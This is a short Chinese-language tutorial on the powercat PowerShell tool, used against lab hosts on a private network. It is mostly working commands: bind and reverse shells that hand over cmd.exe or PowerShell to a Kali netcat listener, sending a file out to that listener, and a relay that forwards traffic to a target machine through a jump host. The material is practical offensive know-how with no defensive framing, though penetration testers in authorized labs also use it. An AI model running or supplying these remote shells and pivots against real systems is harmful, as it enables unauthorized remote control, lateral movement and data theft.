项目地址：https://github.com/besimorhino/powercat.git

powercat与netcat的命令功能非常相似，可以相互连接。其中powercat可以返回powershell，而netcat不支持。

导入powercat：

powershell  #进入powershell命令行
Set-ExecutionPolicy RemoteSigned #设置允许执行本地powershell脚本
Import-Module ./powercat.ps1
powercat -h

nc正向连接PowerCat：

在win7上执行命令，开始监听：powercat -l -p 4444 -e cmd.exe -v

在kali上执行命令，连接win7端口获得cmd命令行：nc 192.168.83.91 4444 -vv

nc反向连接PowerCat：

在kali上执行命令监听：nc -l -p 4444 -vv

在win7中执行命令：powercat -c 192.168.83.100 -p 4444 -v -e cmd.exe

通过PowerCat反弹PowerShell：
在kali上执行命令监听：nc -l -p 4444 -vv开始监听
在win7中执行命令：powercat -c 192.168.83.100 -p 4444 -v -ep

通过PowerCat与nc传输文件：
在kali上执行命令监听：nc -l -p 4444 > test.txt开始监听，并把传输的内容写入到test.txt中
在win7中执行命令：powercat -c 192.168.83.100 -p 4444 -i C:\powercat-master\README.md -v

netcat没有任何显示，但已经传输成功

使用PowerCat作为跳板：
靶机监听：powercat -l -v -p 6666 -e cmd.exe
跳板机监听：powercat -l -v -p 4444 -r tcp:192.168.83.91:6666
这样，当访问跳板机的4444端口时，就会把流量转发给靶机（192.168.83.91）的6666端口中了